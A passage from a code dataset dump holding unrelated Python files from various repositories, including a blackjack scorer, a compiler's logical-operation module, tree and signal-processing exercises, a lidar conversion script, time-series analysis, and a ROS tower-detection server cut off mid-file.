sum=int(a+b+c)\n if(sum<21):\n return sum\n else:\n sum=sum-10\n if(sum<21):\n return sum\n else:\n return 0\nt=int(input())\nwhile(t>0):\n t-=1\n a=int(input())\n b=int(input())\n c=int(input())\n if(sum_p(a,b,c)==0):\n print(\"blackjack\", \"[(\", a,b,c, \")]\", \"--> blast\")\n else:\n 
print(\"blackjack\", \"[(\", a, b, c, \")]\", \"-->\",sum_p(a,b,c))","repo_name":"tanisha1244/cyber-security","sub_path":"assignment 3/3_6.py","file_name":"3_6.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72957854168","text":"from Traduccion.Tipos import *\nfrom Traduccion.Abstracta import abst\nfrom Traduccion.Valores import *\nfrom Traduccion.Variables import variables\nfrom Traduccion.Primitivos import Primitivo\nfrom Errores import *\n\nclass Op_logica(abst):\n def __init__(self, dato1, dato2, operacion, fila, columna):\n self.dato1 = dato1\n self.dato2 = dato2\n self.operacion = operacion\n self.fila = fila\n self.columna = columna\n\n\n def verificar_tipo(self, ambito_actual):\n tipo1 = self.dato1.verificar_tipo(ambito_actual)\n tipo2 = self.dato2.verificar_tipo(ambito_actual)\n\n if tipo1 == Tipo_dato.ENTERO:\n if tipo2 == Tipo_dato.ENTERO:\n return Tipo_dato.ENTERO\n elif tipo2 == Tipo_dato.DECIMAL:\n return Tipo_dato.ENTERO\n elif tipo2 == Tipo_dato.CARACTER:\n return Tipo_dato.ENTERO\n else:\n print(\"ERROR: No se puden comparar INT con CADENAS\")\n Err = Error(\"Operacoin Logica\", \"Semantico\", \"No se pueden comparar int con cadena\",\n self.fila, self.columna)\n Lista_errores.append(Err)\n return False\n elif tipo1 == Tipo_dato.DECIMAL:\n if tipo2 == Tipo_dato.ENTERO:\n return Tipo_dato.ENTERO\n elif tipo2 == Tipo_dato.DECIMAL:\n return Tipo_dato.ENTERO\n elif tipo2 == Tipo_dato.CARACTER:\n return Tipo_dato.ENTERO\n else:\n print(\"ERROR: No se puden comparar DECIMALES con CADENAS\")\n Err = Error(\"Operacion Logica\", \"Semantico\", \"No se pueden comparar decimales con cadenas\",\n self.fila, self.columna)\n Lista_errores.append(Err)\n return False\n elif tipo1 == Tipo_dato.CARACTER:\n if tipo2 == Tipo_dato.ENTERO:\n return Tipo_dato.ENTERO\n elif tipo2 == Tipo_dato.DECIMAL:\n return Tipo_dato.ENTERO\n elif tipo2 == Tipo_dato.CARACTER:\n return Tipo_dato.ENTERO\n else:\n print(\"ERROR: No se puden comparar Caracteres con CADENAS\")\n Err = Error(\"Operacoin Logica\", \"Semantico\", \"No se pueden comparar Caracteres con Cadenas\",\n self.fila, self.columna)\n Lista_errores.append(Err)\n return False\n\n elif tipo1 == Tipo_dato.CADENA:\n if tipo2 == Tipo_dato.CADENA:\n return Tipo_dato.ENTERO\n else:\n Err = Error(\"Operacoin logica\", \"Semantico\", \"Solo se pueden comparar cadenas con cadenas\",\n self.fila, self.columna)\n Lista_errores.append(Err)\n return False\n else:\n return False\n\n def generar_C3D(self, tipo_A = None):#(self, tipo_A)\n augus = \"\"\n dato1 = []\n dato2 = []\n if isinstance(self.dato1, variables):\n dato1 = self.dato1.generar_C3D(tipo_A)\n tipo1 = self.dato1.get_tipo(tipo_A)\n elif isinstance(self.dato1, Primitivo):\n tipo1 = self.dato1.get_tipo()\n if (tipo1 != False and tipo1 == Tipo_dato.ENTERO) or (tipo1 != False and tipo1 == Tipo_dato.DECIMAL):\n dato1 = self.dato1.generar_C3D(tipo_A)\n elif tipo1 != False and tipo1 == Tipo_dato.CARACTER:\n dato1 = self.dato1.generar_C3D(Tipo_dato.ENTERO)\n else:\n dato1 = self.dato1.generar_C3D(tipo_A)\n else:\n dato1 = self.dato1.generar_C3D(tipo_A)\n\n if isinstance(self.dato2, variables):\n dato2 = self.dato2.generar_C3D(tipo_A)\n tipo2 = self.dato2.get_tipo(tipo_A)\n elif isinstance(self.dato2, Primitivo):\n tipo2 = self.dato2.get_tipo()\n if (tipo2 != False and tipo2 == Tipo_dato.ENTERO) or (tipo2 != False and tipo2 == Tipo_dato.DECIMAL):\n dato2 = self.dato2.generar_C3D(tipo_A)\n elif tipo2 != 
False and tipo2 == Tipo_dato.CARACTER:\n dato2 = self.dato2.generar_C3D(Tipo_dato.ENTERO)\n else:\n dato2 = self.dato2.generar_C3D(tipo_A)\n else:\n dato2 = self.dato2.generar_C3D(tipo_A)\n\n augus += dato1[0]\n augus += dato2[0]\n\n val = new_temp()\n\n if self.operacion == Operacion_logica.AND:\n #verificar los tipos y hacer el cast de una\n augus += str(val) + \" = \" + str(dato1[1]) + \" && \" + str(dato2[1]) + \";\" + \"\\n\"\n elif self.operacion == Operacion_logica.OR:\n augus += str(val) + \" = \" + str(dato1[1]) + \" || \" + str(dato2[1]) + \";\" + \"\\n\"\n\n return [augus, val]\n\n def generar_AST(self, dot, nombre):\n nombre_hijo = \"\"\n name = \"\"\n if self.operacion == Operacion_logica.AND:\n nombre_hijo += \"AND_\" + str(new_nombre())\n name += \"&&\"\n else:\n nombre_hijo += \"OR_\" + new_nombre()\n name += \"||\"\n\n dot.edge(nombre, nombre_hijo)\n dot.node(nombre_hijo, name)\n self.dato1.generar_AST(dot, nombre_hijo)\n self.dato2.generar_AST(dot, nombre_hijo)","repo_name":"Cascarus/-OLC2-Proyecto2_201603127","sub_path":"[OLC2]Proyecto2_201603127/Traduccion/Operacion_logica.py","file_name":"Operacion_logica.py","file_ext":"py","file_size_in_byte":5247,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29191528278","text":"class Node:\n def __init__(self, value):\n self.left = None\n self.right = None\n self.value = value\n\n\ndef find_height(temp):\n if temp is None:\n return 0\n left_height = find_height(temp.left)\n right_height = find_height(temp.right)\n return left_height+right_height+1\n\n\ndef find_width(temp, level):\n if temp is None:\n return 0\n if level == 1:\n return 1\n left_width = find_width(temp.left, level-1)\n right_width = find_width(temp.right, level-1)\n return left_width + right_width\n\n\ndef find_max_width(temp):\n if temp is None:\n return 0\n height = find_height(temp)\n max_width = -1\n for i in range(1, height+1):\n width = find_width(temp, i)\n max_width = max(max_width, width)\n return max_width\n\n\nif __name__ == \"__main__\":\n root = Node(1)\n root.left = Node(2)\n root.right = Node(3)\n root.left.left = Node(4)\n root.left.right = Node(5)\n root.right.left = Node(6)\n root.right.right = Node(7)\n\n print(find_max_width(root))\n","repo_name":"cspandit/Python-DS-and-Algo","sub_path":"Binary Tree/problem/find_width_recursive.py","file_name":"find_width_recursive.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37818977072","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 31 16:32:08 2019\n\n@author: eneemann\n\n- Script to convert all .laz files in a directory to .las\n\n31 Jul 2019: Created initial version of code (EMN).\n\"\"\"\n\nimport os\nimport time\nimport subprocess\n\n# Start timer and print start time in UTC\nstart_time = time.time()\nreadable_start = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime())\nprint(\"The script start time is {}\".format(readable_start))\ntoday = time.strftime(\"%Y%m%d\")\n\n\n#lidar_dir = r\"C:\\Users\\eneemann\\Desktop\\Kanab Lidar\"\n#os.chdir(lidar_dir)\n#\n#filenumber = 0\n#dir_list = os.listdir(lidar_dir)\n#total = len(dir_list)\n#for filename in dir_list:\n# filenumber += 1\n# print(f\"Starting on file {filenumber} of {total}\")\n# base = os.path.splitext(filename)[0]\n# command = f\"pdal translate {base}.laz {base}.las\"\n# print(command)\n# subprocess.check_call(command)\n# print(f\"Done with file {filenumber}, moving 
on to next file ...\")\n \n \n \n \nlidar_dir = r\"C:\\Users\\eneemann\\Desktop\\Bountiful Lidar\"\nos.chdir(lidar_dir)\n\nfilenumber = 0\ndir_list = os.listdir(lidar_dir)\ntotal = len(dir_list)\nfor filename in dir_list:\n filenumber += 1\n print(f\"Starting on file {filenumber} of {total}\")\n base = os.path.splitext(filename)[0]\n command = f\"gdal_translate -of GTiff {base}.img {base}.tif\"\n print(command)\n subprocess.check_call(command)\n print(f\"Done with file {filenumber}, moving on to next file ...\")\n \n \n \n\n \nprint(\"Script shutting down ...\")\n# Stop timer and print end time in UTC\nreadable_end = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime())\nprint(\"The script end time is {}\".format(readable_end))\nprint(\"Time elapsed: {:.2f}s\".format(time.time() - start_time))","repo_name":"eneemann/lidar","sub_path":"lidar_conversion_script.py","file_name":"lidar_conversion_script.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26904953045","text":"import argparse\nfrom experiment import Experiment\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('action', choices=['train', 'test'])\n args = parser.parse_args()\n seed = 42\n\n model = Experiment(seed)\n if args.action == 'train':\n model.train()\n elif args.action == 'test':\n model.test()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"KimYoungMuri/LSTM-code-fixer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36951481573","text":"# -*- coding: utf-8 -*-\n# author: frendy\n# site: http://frendy.vip/\n# time: 28/06/2017\n\nimport os\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom config import MODEL_PATH, DATA_PATH\nfrom models.model import transform, Net\nfrom data import loadTrainData\n\ntrainset, trainloader = loadTrainData()\n\nnet = Net()\nif os.path.exists(MODEL_PATH):\n net.load_state_dict(torch.load(MODEL_PATH))\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(net.parameters(), lr=0.001, momentum=0.9)\n\nfor epoch in range(2): # loop over the dataset multiple times\n\n running_loss = 0.0\n for i, data in enumerate(trainloader, 0):\n # get the inputs\n inputs, labels = data\n\n # wrap them in Variable\n inputs, labels = Variable(inputs), Variable(labels)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n outputs = net(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n # print statistics\n running_loss += loss.data[0]\n if i % 2000 == 1999: # print every 2000 mini-batches\n print('[%d, %5d] loss: %.3f' %\n (epoch + 1, i + 1, running_loss / 2000))\n running_loss = 0.0\n\nprint('Finished Training')\n\n# save model\ntorch.save(net.state_dict(), MODEL_PATH)","repo_name":"frendyxzc/ImageClassifier","sub_path":"train/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29871751276","text":"import math\nimport numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\ndef get_xa(_t, _T, _fs, _xs):\n _val = 0.0\n for n, xi in enumerate(_xs):\n _var = math.pi* _fs * (_t-n*_T)\n _val += xi * math.sin(_var)/_var if _var != 0 else 
xi\n return _val\n\nf = 100\ndt = 1e-5\nt = np.arange(start=0, stop=0.1, step=dt)\nx = np.sin(np.multiply(2.0*math.pi*f, t))\n\n\nfs = 300\ndT = 1.0/float(fs)\nts = np.arange(start=0, stop=0.1, step=dT)\nxs = np.sin(np.multiply(2.0*math.pi*f, ts))\n\nxa = list(map(lambda _t: get_xa(_t, _T=dT, _fs=fs, _xs=xs), t))\n\n\nfig, axs = plt.subplots(2, sharex=True, sharey=True, figsize=(12,7))\naxs[0].plot(t, x, label=\"Signal\")\naxs[0].plot(ts, xs, \"o\", label=\"Sampling\")\naxs[0].plot(t, xa, \"r--\", alpha=0.4, label=\"Shannon Interpolation\")\naxs[0].legend()\naxs[0].set_title(\"Over sampling\")\n\nfs = 70\ndT = 1.0/float(fs)\nts = np.arange(start=0, stop=0.1, step=dT)\nxs = np.sin(np.multiply(2.0*math.pi*f, ts))\n\nxa = list(map(lambda _t: get_xa(_t, _T=dT, _fs=fs, _xs=xs), t))\n\naxs[1].plot(t, x, label=\"Signal\")\naxs[1].plot(ts, xs, \"o\", label=\"Sampling\")\naxs[1].plot(t, xa, \"r--\", alpha=0.4, label=\"Shannon Interpolation\")\n# axs[1].legend()\naxs[1].set_title(\"Under sampling\")\n\nplt.savefig(\"result_sin.png\")\n# plt.show()","repo_name":"calzonelover/signal_image_processing","sub_path":"LAB01/02_sin_sample.py","file_name":"02_sin_sample.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23643317118","text":"# -*- coding: utf-8 -*-\r\n\r\nclass Palabras():\r\n \r\n __numeroFrases = 0\r\n \r\n def __init__(self,frase):\r\n self.frase = frase\r\n Palabras.__numeroFrases += 1\r\n @property\r\n def frase(self):\r\n return self.__frase\r\n @frase.setter\r\n def frase(self,frase):\r\n import re\r\n match = re.search('[a-zA-Z]+',frase)\r\n assert match, \"Palabra invalida\"\r\n self.__frase = frase \r\n @property \r\n def contarLetras(self):\r\n return len(self.frase.replace(\" \",\"\"))\r\n def subCadena(self,sub):\r\n return self.frase.count(sub)\r\n @classmethod\r\n def cuantasCreadas(cls):\r\n return \"Numero de frases creadas: {}\".format(cls.__numeroFrases)\r\n def __add__ (self, other):\r\n return Palabras(self.frase + \" \" + other.frase)\r\n def __str__(self):\r\n return \"Su frase es: \" + str(self.frase)\r\n def __eq__(self,other):\r\n if(self.frase==other.frase):\r\n return True\r\n else:\r\n return False\r\n def letrasComun(self,nuevaFrase):\r\n solucion = []\r\n for x in self.frase:\r\n if(x in nuevaFrase) and (x != ' '):\r\n solucion.append(x)\r\n return solucion\r\n @staticmethod\r\n def valida(frase):\r\n import re\r\n return bool(re.match(\"^[\\sA-Za-z]*$\",frase))\r\n def __del__(self):\r\n Palabras.__numeroFrases -= 1\r\ntry:\r\n palabra = Palabras(\"Hola mundo\")\r\n print(palabra)\r\n palabra1 = Palabras(\"Hola mundo\")\r\n palabra2 = Palabras(\"Adios chico\")\r\n print(palabra.contarLetras)\r\n print(palabra.subCadena(\"mundo\"))\r\n print(palabra.cuantasCreadas())\r\n print(palabra + palabra2)\r\n print(palabra == palabra2)\r\n print(palabra == palabra1)\r\n print(palabra.letrasComun(\"Hola mediterraneo\"))\r\n del palabra2\r\n print(palabra.cuantasCreadas())\r\n print(Palabras.valida(\"perro\"))\r\nexcept Exception as e:\r\n print(e)\r\n","repo_name":"ricardomartinez4/python","sub_path":"orientadoObjetos/practica.py","file_name":"practica.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9403821120","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom statsmodels.tsa.stattools import adfuller\nimport os\nimport numpy as np\nimport seaborn 
as sns\nimport statsmodels\nimport matplotlib\nimport numpy as np\nimport statsmodels.api as sm\nimport statsmodels.tsa.arima_model\nfrom sklearn.model_selection import train_test_split\nfrom pandas import Series\nfrom statsmodels.tsa.seasonal import STL\nimport statsmodels.tsa.holtwinters as ets\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nfrom statsmodels.tsa.holtwinters import SimpleExpSmoothing\nfrom statsmodels.tsa.holtwinters import ExponentialSmoothing\nfrom sklearn import metrics\nfrom numpy import linalg as LA\nimport math\nfrom scipy import signal\nimport warnings\nwarnings.filterwarnings('ignore')\n\ndata = pd.read_csv('underwater_temperature.csv',index_col='ID', parse_dates=True,encoding= 'unicode_escape')\nz=data.copy(deep=True)\ndf=z.iloc[::3,:]\n\nprint(df.isnull().sum().sum())\nprint(df.columns)\n#Preprocessing\nprint(df['Site'].isnull().sum().sum())\nprint(df['Latitude'].isnull().sum().sum())\nprint(df['Longitude'].isnull().sum().sum())\nprint(df['Date'].isnull().sum().sum())\nprint(df['Time'].isnull().sum().sum())\nprint(df['Temp (°C)'].isnull().sum().sum()) #2 missing values\n\n#preproccesing the Data›\ndf.rename(columns={'Temp (°C)':'Temp'},inplace=True)\nmean_value=df['Temp'].mean()\ndf['Temp'].fillna(value=mean_value, inplace=True)\nprint(df['Temp'].isnull().sum().sum()) #2 missing values\n\n#now we don't have any missing values\n#plot the data vs time\nsns.lineplot(data=df, x=\"Time\",y=\"Temp\")\nplt.title('the dependency of temp and time')\nplt.show()\n#ACF/PACF of the dependent variable\nfrom statsmodels.graphics.tsaplots import plot_acf , plot_pacf\ndef ACF_PACF_Plot(y,lags):\n acf = sm.tsa.stattools.acf(y, nlags=lags)\n pacf = sm.tsa.stattools.pacf(y, nlags=lags)\n fig = plt.figure()\n plt.subplot(211)\n plt.title('ACF/PACF of the raw data')\n plot_acf(y, ax=plt.gca(), lags=lags)\n plt.subplot(212)\n plot_pacf(y, ax=plt.gca(), lags=lags)\n fig.tight_layout(pad=3)\n plt.show()\nACF_PACF_Plot(df['Temp'],20)\nprint(pd.unique(df['Site']))\n#because of PACF the Ar is going to be 1\n\ncorr=df.corr()\nax =sns.heatmap(corr)\nplt.show()\ndf['Time']=df[\"Time\"].str[:-3]\ny=df['Temp']\nx=df.drop(['Temp','Site','Date','Time'],axis=1)\nx_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2)\n#rolling mean\ndef rolling_mean_var(x):\n df_rolling = pd.DataFrame()\n mean=[]\n var=[]\n for i in range(len(x)):\n mean.append(x[0:i+1].mean())\n var.append(x[0:i+1].var())\n df_rolling['mean'] = mean\n df_rolling['var'] = var\n df_rolling.fillna(0, inplace=True)\n #====\n fig = plt.figure(figsize=(10, 8))\n plt.subplot(2, 1, 1)\n plt.plot('mean', data=df_rolling, label=\"Mean\", color='red')\n plt.title(\"Rolling Mean & Variance\")\n plt.xticks([])\n plt.grid()\n plt.ylabel('mean')\n plt.legend()\n plt.subplot(2, 1, 2)\n plt.plot('var', data=df_rolling, label=\"variance\", color='blue')\n plt.grid()\n plt.ylabel('variance')\n plt.legend()\n plt.show()\nrolling_mean_var(df['Temp'])\n\n#Stationary\n#ADF test for temp\n\nx=df['Temp'].values\nresault=adfuller(x)\nprint('ADF Statistic :%f'% resault[0])\nprint('p_value: %f'% resault[1])\nprint('Critical Values:')\nfor key, value in resault[4].items():\n print('\\t%s:%.3f'%(key,value))\nif resault[0] < resault[4]['5%']:\n print('Temp is Stationary')\nelse:\n print('Temp is not stationory')\n#KPS Test\nfrom statsmodels.tsa.stattools import kpss\nx=df['Temp'].values\ndef kpss_test(x):\n print ('Results of KPSS Test:')\nkpsstest = kpss(x, regression='c', 
nlags=\"auto\")\nkpss_output = pd.Series(kpsstest[0:3], index=['Test Statistic','p-value','LagsUsed'])\nfor key,value in kpsstest[3].items():\n kpss_output['Critical Value (%s)'%key] = value\nprint('KPSS output for Temp is :')\nprint (kpss_output)\n\n#first diferencing because the KPSS is not stationary\ndef f_difference(dataset, interval):\n diff = []\n\n for i in range(interval, len(dataset),interval):\n value = dataset[i] - dataset[i - interval]\n if i == 1:\n diff.append(0)\n elif i == 2 and interval == 2:\n diff.append(0)\n diff.append(0)\n elif i == 3 and interval == 3:\n diff.append(0)\n diff.append(0)\n diff.append(0)\n\n diff.append(value)\n return diff\nx=f_difference(df['Temp'].values,1)\n\n#Kpss after first differnecing\ndef kpss_test(x):\n print ('Results of KPSS Test:')\nkpsstest = kpss(x, regression='c', nlags=\"auto\")\nkpss_output = pd.Series(kpsstest[0:3], index=['Test Statistic','p-value','LagsUsed'])\nfor key,value in kpsstest[3].items():\n kpss_output['Critical Value (%s)'%key] = value\nprint('KPSS output for Temp is :')\nprint (kpss_output)\n\n#Decomposition\n\nTemp = df['Temp']\n# df.replace(to_replace =[\"/\"],\n# value =\"-\")\ndates= pd.date_range(start='2013-02-20 11:40:00', periods=len(df),freq='1H')\ntemp_volume= pd.Series(df['Temp'].ravel(),index=dates)\nSTL = STL(temp_volume)\nres = STL.fit()\nfig = res.plot()\nplt.xlabel(\"Time (Year)\")\nplt.suptitle('STL Decomposition', y=1.05)\nplt.show()\n#\n# #seasonality and trend\nT=res.trend\nS=res.seasonal\nR=res.resid\nadj_seasonal=Temp - S\nplt.plot(Temp,label='original')\nplt.plot(adj_seasonal,label='Seasonality Adjusted')\nplt.xlabel('time')\nplt.ylabel('Temp')\nplt.title('seasonality adjused data')\nplt.legend()\nplt.show()\n#strength of tren\nF=np.maximum(0,1-np.var(R)/np.var(np.array(T)+np.array(R)))\nprint(f'the strength of Trend is{F}')\n#dtrended\nT=res.trend\nS=res.seasonal\nR=res.resid\ndetrended=Temp - T\nplt.plot(Temp,label='original')\nplt.plot(detrended,label='detrended')\nplt.xlabel('time')\nplt.ylabel('Temp')\nplt.title('adjusted detrended')\nplt.legend()\nplt.show()\n#strength of seasonality\nF=np.maximum(0,1-np.var(R)/np.var(np.array(S)+np.array(R)))\nprint(f'the strength of seasonality is{F}')\n\n#holt_trend\nn1=len(y_train)\nn2 = len(y_test)\n# train= df['Temp'][:n1]\n# test= df['Temp'][n1:]\nmodel=ets.ExponentialSmoothing(y_train, trend='add', damped_trend=True, seasonal=None).fit()\nfitted= model.fittedvalues\nforecast_holt= model.forecast(steps=len(y_test))\nresidual_error= y_train[1:].values-fitted[:-1].values\nACF_PACF_Plot(residual_error,20)\nplt.hist(residual_error)\nplt.show()\nQ_holt=sm.stats.acorr_ljungbox(residual_error, lags=[20],return_df=True)\nprint(Q_holt)\nplt.plot(list(range(0,n1)),y_train,label='Train')\nplt.plot(list(range(n1,n1+n2)),y_test,label='Test')\nplt.plot(list(range(n1,n1+n2)),forecast_holt,label='Forecast')\nplt.title('forcast function for holt_trend')\nplt.legend()\nplt.show()\nforcast_error_holt=y_test[2:].values-forecast_holt[:-2].values\n#when the p value for Q is more than 0.05 is white which is not here now\n#Chi square test\nfrom scipy.stats import chi2\ndef chi_test(na,nb,lags,Q,e):\n DOF=lags-na-nb\n alpha=0.01\n chi_critical=chi2.ppf(1-alpha,DOF)\n if Q N: # 예전날짜+걸리는 날(시작하는 날)이 남은 N일보다 크면 새로운 날로 안가고 반복문 종료\n# break\n# i = i+T[i]\n# if i > N:\n# break\n# if i + T[i] - 1 > N: # 새로운 날짜+걸리는 날-1(끝나는 날)이 남은 N일보다 크면 반복문 종료\n# break\n# return p\n\ndef plan(i, p):\n while True:\n p = p + P[i]\n if i + T[i] - 1 > N:\n break\n i = i+T[i]\n if i > N:\n break\n if i + 
T[i] - 1 > N: # 새로운 날짜+걸리는 날-1(끝나는 날)이 남은 N일보다 크면 반복문 종료\n break\n profits.append(p)\n\nN = int(input())\n# schedule = [[] for _ in range(N+1)]\ncan = []\nT = [0] * (N+1)\nP = [0] * (N+1)\n\nfor i in range(1, N+1):\n Ti, Pi = map(int,input().split())\n T[i] = Ti\n P[i] = Pi\n profits = []\n\nfor i in range(1, N+1):\n if i + T[i] - 1 <= N:\n profits.append(plan(i, 0))\n\nprint(profits)\nprint(max(profits))\n\n","repo_name":"burgerfacegirl/Algorithm","sub_path":"boj/14501_퇴사.py","file_name":"14501_퇴사.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74717879447","text":"#!/usr/bin/env python\n# -*- coding: utf-8; -*-\n\"\"\"\ntower_detect_viewer_server.py\n\ncommunicating with the browser and controlling the visualization\n\n\"\"\"\n\nimport sys\nimport rospy\n\nPKG='jsk_pcl_ros'\n\nimport imp\ntry:\n imp.find_module(PKG)\nexcept:\n import roslib;roslib.load_manifest(PKG)\n\nfrom image_view2.msg import ImageMarker2, PointArrayStamped\nfrom geometry_msgs.msg import Point\nfrom std_msgs.msg import Int16\nfrom std_msgs.msg import String\nfrom std_msgs.msg import Header\nfrom jsk_pcl_ros.msg import Int32Stamped\nfrom jsk_recognition_msgs.srv import *\nimport jsk_recognition_msgs.srv\nimport tf\nfrom draw_3d_circle import Drawer3DCircle\n\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\nimport cv\n\nclass State:\n INITIAL = 1\n SELECT_TOWER = 2\n CONFIRM = 3\n START_TASK = 4\n INITIALIZE_PROBLEM = 5\n MOVE_LARGE_S_G = 6\n MOVE_MIDDLE_S_I = 7\n MOVE_LARGE_G_I = 8\n MOVE_SMALL_S_G = 9\n MOVE_LARGE_I_S = 10\n MOVE_MIDDLE_I_G = 11\n MOVE_LARGE_S_G = 12\n def __init__(self, topic):\n self.pub = rospy.Publisher(topic, Int16)\n self.state_val = -1\n def publish(self):\n self.pub.publish(Int16(self.state_val))\n def updateState(self, next_state):\n self.state_val = next_state\n self.publish()\n\n \nclass TowerDetectViewerServer:\n # name of tower\n TOWER_LOWEST = jsk_recognition_msgs.srv.TowerRobotMoveCommandRequest.TOWER_LOWEST\n TOWER_MIDDLE = jsk_recognition_msgs.srv.TowerRobotMoveCommandRequest.TOWER_MIDDLE\n TOWER_HIGHEST = jsk_recognition_msgs.srv.TowerRobotMoveCommandRequest.TOWER_HIGHEST\n PLATE_SMALL = jsk_recognition_msgs.srv.TowerRobotMoveCommandRequest.PLATE_SMALL\n PLATE_MIDDLE = jsk_recognition_msgs.srv.TowerRobotMoveCommandRequest.PLATE_MIDDLE\n PLATE_LARGE = jsk_recognition_msgs.srv.TowerRobotMoveCommandRequest.PLATE_LARGE\n PLATE_HEIGHT_LOWEST = 0\n PLATE_HEIGHT_MIDDLE = 1\n PLATE_HEIGHT_HIGHEST = 2\n ROBOT0_BASE_FRAME_ID = \"/R1/L0\"\n ROBOT1_BASE_FRAME_ID = \"/R2/L0\"\n def __init__(self):\n # initialize the position of the tower\n self.tower_position = {\n self.TOWER_LOWEST: Point(),\n self.TOWER_MIDDLE: Point(),\n self.TOWER_HIGHEST: Point()\n }\n self.radius = rospy.get_param(\"radius\", 0.075)\n self.circle0 = Drawer3DCircle(\"/image_marker\", 1, \"/cluster00\",\n self.radius, [1, 0, 0])\n self.circle1 = Drawer3DCircle(\"/image_marker\", 2, \"/cluster01\",\n self.radius, [0, 1, 0])\n self.circle2 = Drawer3DCircle(\"/image_marker\", 3, \"/cluster02\",\n self.radius, [0, 0, 1])\n self.circles = [self.circle0, self.circle1, self.circle2]\n # bgr\n self.color_indices = [[0, 0, 255], [0, 255, 0], [255, 0, 0]]\n self.cluster_num = -1\n self.circle0.advertise()\n self.circle1.advertise()\n self.circle2.advertise()\n self.bridge = CvBridge()\n self.state = State(\"/browser/state\")\n self.tf_listener = tf.TransformListener()\n self.browser_click_sub = 
rospy.Subscriber(\"/browser/click\", \n Point, \n self.clickCB)\n self.browser_message_pub = rospy.Publisher(\"/browser/message\",\n String)\n self.image_sub = rospy.Subscriber(\"/image_marked\",\n Image,\n self.imageCB)\n self.cluster_num_sub = rospy.Subscriber(\"/pcl_nodelet/clustering/cluster_num\",\n Int32Stamped,\n self.clusterNumCB)\n self.check_circle_srv = rospy.Service(\"/browser/check_circle\",\n CheckCircle,\n self.checkCircleCB)\n self.pickup_srv = rospy.Service(\"/browser/pickup\",\n TowerPickUp,\n self.pickupCB)\n self.state.updateState(State.INITIAL)\n\n # waiting for ik server\n if rospy.get_param(\"~wait_robot_move_command\", False):\n rospy.loginfo(\"waiting for robot server\")\n rospy.wait_for_service(\"/browser/tower_robot_move_command\")\n self.robot_command = rospy.ServiceProxy(\"/browser/tower_robot_move_command\", TowerRobotMoveCommand)\n rospy.loginfo(\"connected to robot_move server\")\n\n # initialize the position of the towers from TL\n self.updateTowerPosition(self.TOWER_LOWEST)\n self.updateTowerPosition(self.TOWER_MIDDLE)\n self.updateTowerPosition(self.TOWER_HIGHEST)\n self.S_TOWER = self.TOWER_MIDDLE\n self.G_TOWER = None\n self.I_TOWER = None\n def towerNameToFrameId(self, tower_name):\n if tower_name == self.TOWER_LOWEST:\n return \"/cluster02\"\n elif tower_name == self.TOWER_MIDDLE:\n return \"/cluster01\"\n elif tower_name == self.TOWER_HIGHEST:\n return \"/cluster00\"\n else:\n raise Exception(\"unknown tower: %d\" % (tower_name))\n def resolveTowerName(self, tower_id):\n if tower_id == self.TOWER_LOWEST:\n return \"TOWER_LOWEST\"\n elif tower_id == self.TOWER_MIDDLE:\n return \"TOWER_MIDDLE\"\n elif tower_id == self.TOWER_HIGHEST:\n return \"TOWER_HIGHEST\"\n else:\n raise Exception(\"unknown tower: %d\" % (tower_id))\n def resolvePlateName(self, plate_id):\n if plate_id == self.PLATE_SMALL:\n return \"PLATE_SMALL\"\n elif plate_id == self.PLATE_MIDDLE:\n return \"PLATE_MIDDLE\"\n elif plate_id == self.PLATE_LARGE:\n return \"PLATE_LARGE\"\n else:\n raise Exception(\"unknown plate id: %d\" % (plate_id))\n def resolvePlateHeightOffset(self, height_id):\n \"\"\"\n return the offset of z-axis of `height_id'\n \"\"\"\n return 0.0\n def resolvePlateHeight(self, height_id):\n if height_id == self.PLATE_HEIGHT_LOWEST:\n return \"lowest\"\n elif height_id == self.PLATE_HEIGHT_MIDDLE:\n return \"middle\"\n elif height_id == self.PLATE_HEIGHT_HIGHEST:\n return \"highest\"\n else:\n raise Exception(\"unknown plate height: %d\" % (height_id))\n def robotBaseFrameId(self, index): #index is 0 or 1\n if index == 0:\n return self.ROBOT0_BASE_FRAME_ID\n elif index == 1:\n return self.ROBOT1_BASE_FRAME_ID\n else:\n raise Exception(\"unknown index: %d\" % (index))\n def updateTowerPosition(self, tower_name):\n frame_id = self.towerNameToFrameId(tower_name)\n rospy.loginfo(\"resolving %s\" % (frame_id))\n 